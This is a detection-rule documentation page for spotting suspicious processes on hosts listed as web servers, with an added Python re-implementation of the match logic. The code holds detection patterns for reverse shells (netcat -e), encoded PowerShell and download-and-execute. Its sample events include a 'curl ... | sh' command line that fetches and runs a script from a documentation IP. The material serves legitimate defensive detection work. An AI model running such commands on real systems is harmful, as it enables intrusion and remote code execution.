MATCH-S00539.md

Rules: Web Servers Executing Suspicious Processes

Description

This rule looks for suspicious processes running on hosts labeled as web servers. Populate a match list of web-server hosts before enabling the rule; it identifies web servers by matching events against that list, so with an empty list there is nothing for it to match and it produces no signals.

Additional Details

| Detail | Value |
|---|---|
| Type | Templated Match |
| Category | Defense Evasion |
| Apply Risk to Entities | device_hostname, device_ip, user_username |
| Signal Name | Web Servers Executing Suspicious Processes |
| Summary Expression | Suspicious process detected on host: {{device_hostname}} designated a web server |
| Score/Severity | Static: 4 |
| Enabled by Default | False |
| Prototype | False |
| Tags | _mitreAttackTactic:TA0003, _mitreAttackTechnique:T1505, _mitreAttackTechnique:T1505.003 |

Vendors and Products

Fields Used

| Origin | Field |
|---|---|
| Normalized Schema | commandLine |
| Normalized Schema | device_hostname |
| Normalized Schema | device_ip |
| Normalized Schema | listMatches |
| Normalized Schema | user_username |
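As an added illustration (not the rule's own match expression, which this page does not include), the Python below re-implements the logic described in the Description over a few constructed normalized events, combining the fields listed under Fields Used: listMatches selects hosts on the web-server list, commandLine is tested against suspicious-process indicators, and device_hostname, device_ip and user_username become the entities that carry the risk. The list name `web_servers`, the command-line patterns, and the sample events are assumptions made for the example.

```python
"""Illustrative match logic for "Web Servers Executing Suspicious Processes".

Added example, not the rule's own expression. Assumptions: the web-server
match list is named "web_servers" and its name appears in the event's
listMatches field; the command-line patterns are a representative, not
authoritative, set of web-shell follow-on activity.
"""
import re

# Assumed name of the match list of web servers that must be populated.
WEB_SERVER_LIST = "web_servers"

# Assumed suspicious command-line indicators (recon, user enumeration,
# encoded PowerShell, reverse shells, download-and-execute, LOLBin fetch).
SUSPICIOUS_PATTERNS = {
    "whoami": re.compile(r"\bwhoami\b", re.I),
    "net user/group": re.compile(r"\bnet\s+(user|group|localgroup)\b", re.I),
    "encoded powershell": re.compile(
        r"\bpowershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", re.I),
    "cmd /c": re.compile(r"\bcmd(\.exe)?\s+/c\b", re.I),
    "netcat -e": re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\b", re.I),
    "curl|sh": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I),
    "certutil urlcache": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I),
}

# Summary expression and static severity taken from the rule details above.
SUMMARY = "Suspicious process detected on host: {device_hostname} designated a web server"
SEVERITY = 4
SIGNAL_NAME = "Web Servers Executing Suspicious Processes"
RISK_ENTITIES = ("device_hostname", "device_ip", "user_username")


def is_web_server(event):
    """True when the event's listMatches names the web-server list."""
    return WEB_SERVER_LIST in event.get("listMatches", [])


def matched_pattern(command_line):
    """Return the label of the first suspicious pattern hit, or None."""
    for label, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(command_line or ""):
            return label
    return None


def evaluate(events):
    """Run the match over normalized process events; one signal per hit."""
    signals = []
    for ev in events:
        if not is_web_server(ev):
            continue  # not a designated web server: out of scope
        label = matched_pattern(ev.get("commandLine"))
        if label is None:
            continue  # benign process on a web server
        signals.append({
            "signal_name": SIGNAL_NAME,
            "summary": SUMMARY.format(device_hostname=ev["device_hostname"]),
            "severity": SEVERITY,
            "device_hostname": ev["device_hostname"],
            "entities": {k: ev.get(k) for k in RISK_ENTITIES},
            "matched": label,
            "commandLine": ev.get("commandLine"),
        })
    return signals


# Constructed sample events in the normalized schema (not real telemetry).
SAMPLE_EVENTS = [
    {"device_hostname": "web01", "device_ip": "10.0.1.10",
     "user_username": "IIS APPPOOL\\DefaultAppPool",
     "listMatches": ["web_servers"], "commandLine": "cmd.exe /c whoami"},
    {"device_hostname": "web01", "device_ip": "10.0.1.10",
     "user_username": "IIS APPPOOL\\DefaultAppPool",
     "listMatches": ["web_servers"],
     "commandLine": r"C:\Windows\System32\inetsrv\w3wp.exe -ap DefaultAppPool"},
    {"device_hostname": "db01", "device_ip": "10.0.2.20",
     "user_username": "svc_sql", "listMatches": [],
     "commandLine": "powershell.exe -NoP -enc SQBFAFgA"},
    {"device_hostname": "web02", "device_ip": "10.0.1.11",
     "user_username": "www-data", "listMatches": ["web_servers"],
     "commandLine": '/bin/sh -c "curl http://198.51.100.7/x.sh | sh"'},
]

if __name__ == "__main__":
    for sig in evaluate(SAMPLE_EVENTS):
        print(f"[{sig['severity']}] {sig['summary']} "
              f"({sig['matched']}): {sig['commandLine']}")
```

Two of the four constructed events fire: the `cmd.exe /c whoami` and the `curl ... | sh` on hosts in the list. The encoded PowerShell on `db01` is suspicious but is not on a web server, so this rule ignores it, which is the point of scoping on listMatches. The pattern set is the part an analyst tunes; legitimate administration scripts on web hosts are the expected false-positive source, and an unpopulated list yields no signals at all, which is consistent with the rule shipping disabled by default.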